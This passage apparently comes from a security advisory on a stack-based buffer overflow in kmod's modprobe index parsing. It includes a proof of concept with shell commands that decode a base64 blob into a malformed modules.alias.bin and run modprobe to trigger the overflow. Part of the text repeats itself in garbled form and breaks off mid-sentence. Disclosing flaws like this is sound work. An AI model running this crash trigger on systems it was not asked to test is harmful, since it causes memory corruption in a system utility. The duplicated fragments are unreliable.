If value of first is negative, then a broken index can trigger a stack based buffer overflow, because child_count could become larger than INDEX_CHILDMAX.
Proof of Concept:
Create broken index files
MYDIR=$(mktemp -d)
KDIR=$MYDIR/lib/modules/$(uname -r)
mkdir -p $KDIR
cat > $MYDIR/bin.xz.b64 << EOF
/Td6WFoAAATm1rRGBMAinAghARwAAAAAAAAAAOX2A/rgBBsAGl0AWAHahc6kB/nBvrJW9H1Nj78L
jsj0KxaUn0kAAAA4Anj08IzoigABPpwIAAAA/lBnLLHEZ/sCAAAAAARZWg==
EOF
base64 -d $MYDIR/bin.xz.b64 | xz -cd > $KDIR/modules.alias.bin
for i in builtin.alias builtin dep symbols
do
ln -s modules.alias.bin $KDIR/modules.$i.bin
done
Run modprobe
modprobe -cd $MYDIR
On glibc based systems, you will most likely encounter a message like
If value of
first
is negative, then a broken index can trigger a stack based buffer overflow, becausechild_count
could become larger than INDEX_CHILDMAX.Proof of Concept:
On glibc based systems, you will most likely encounter a message like
Alternatively, compile with address sanitizer.